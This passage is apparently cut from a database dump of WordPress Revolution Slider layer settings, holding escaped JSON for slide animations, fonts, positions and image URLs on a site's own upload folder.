To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"60px\",\"e\":true},\"n\":{\"v\":\"60px\",\"e\":true},\"t\":{\"v\":\"60px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(25,11,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"solid\",\"color\":\"#2d2a2a\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Image 1\",\"alias\":\"Image 1\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/landing-footer-img1.png\",\"imageId\":3446},\"size\":{\"width\":{\"d\":{\"v\":\"317px\",\"e\":true},\"n\":{\"v\":\"280px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"124px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"365px\",\"e\":true},\"n\":{\"v\":\"322px\",\"e\":true},\"t\":{\"v\":\"228px\",\"e\":true},\"m\":{\"v\":\"143px\",\"e\":true}},\"originalWidth\":317,\"originalHeight\":365,\"aspectRatio\":{\"d\":{\"v\":0.8684931506849315},\"n\":{\"v\":0.8684931506849315},\"t\":{\"v\":0.8684931506849315},\"m\":{\"v\":0.8684931506849315}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-586px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-8px\",\"e\":true},\"n\":{\"v\":\"-200px\",\"e\":true},\"t\":{\"v\":\"-8px\",\"e\":true},\"m\":{\"v\":\"-34px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-footer-img21.png\",\"imageId\":4603},\"size\":{\"width\":{\"d\":{\"v\":\"199px\",\"e\":true},\"n\":{\"v\":\"159px\",\"e\":true},\"t\":{\"v\":\"107px\",\"e\":true},\"m\":{\"v\":\"58px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"148px\",\"e\":true},\"t\":{\"v\":\"100px\",\"e\":true},\"m\":{\"v\":\"54px\",\"e\":true}},\"originalWidth\":199,\"originalHeight\":185,\"aspectRatio\":{\"d\":{\"v\":1.0756756756756756},\"n\":{\"v\":1.0756756756756756},\"t\":{\"v\":1.0756756756756756},\"m\":{\"v\":1.0756756756756756}}},\"position\":{\"x\":{\"d\":{\"v\":\"542px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"417px\",\"e\":true},\"m\":{\"v\":\"218px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-7px\",\"e\":true},\"n\":{\"v\":\"-276px\",\"e\":true},\"t\":{\"v\":\"-2px\",\"e\":true},\"m\":{\"v\":\"-1px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":1,\"scaleY\":1,\"opacity\":1,\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":0,\"skewY\":0,\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power4.inOut\",\"speed\":500,\"start\":0},\"chars\":{\"use\":true,\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":1,\"scaleY\":1,\"opacity\":1,\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":0,\"skewY\":0,\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power4.inOut\",\"speed\":500,\"start\":0},\"chars\":{\"use\":true}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8250,\"endWithSlide\":true}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Image 3\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic31.png\",\"imageId\":4604},\"size\":{\"width\":{\"d\":{\"v\":\"240px\",\"e\":true},\"n\":{\"v\":\"218px\",\"e\":true},\"t\":{\"v\":\"147px\",\"e\":true},\"m\":{\"v\":\"119px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"205px\",\"e\":true},\"n\":{\"v\":\"186px\",\"e\":true},\"t\":{\"v\":\"125px\",\"e\":true},\"m\":{\"v\":\"101px\",\"e\":true}},\"originalWidth\":240,\"originalHeight\":205,\"aspectRatio\":{\"d\":{\"v\":1.170731707317073},\"n\":{\"v\":1.170731707317073},\"t\":{\"v\":1.170731707317073},\"m\":{\"v\":1.170731707317073}}},\"position\":{\"x\":{\"d\":{\"v\":\"154px\",\"e\":true},\"n\":{\"v\":\"154px\",\"e\":true},\"t\":{\"v\":\"-81px\",\"e\":true},\"m\":{\"v\":\"-69px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-69px\",\"e\":true},\"n\":{\"v\":\"-310px\",\"e\":true},\"t\":{\"v\":\"-74px\",\"e\":true},\"m\":{\"v\":\"-74px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Image 5\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide2-graphic41.png\",\"imageId\":4605},\"size\":{\"width\":{\"d\":{\"v\":\"328px\",\"e\":true},\"n\":{\"v\":\"273px\",\"e\":true},\"t\":{\"v\":\"217px\",\"e\":true},\"m\":{\"v\":\"101px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"339px\",\"e\":true},\"n\":{\"v\":\"282px\",\"e\":true},\"t\":{\"v\":\"224px\",\"e\":true},\"m\":{\"v\":\"104px\",\"e\":true}},\"originalWidth\":328,\"originalHeight\":339,\"aspectRatio\":{\"d\":{\"v\":0.967551622418879},\"n\":{\"v\":0.967551622418879},\"t\":{\"v\":0.967551622418879},\"m\":{\"v\":0.967551622418879}}},\"position\":{\"x\":{\"d\":{\"v\":\"90px\",\"e\":true},\"n\":{\"v\":\"585px\",\"e\":true},\"t\":{\"v\":\"5px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-10px\",\"e\":true},\"n\":{\"v\":\"-202px\",\"e\":true},\"t\":{\"v\":\"-4px\",\"e\":true},\"m\":{\"v\":\"-4px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim 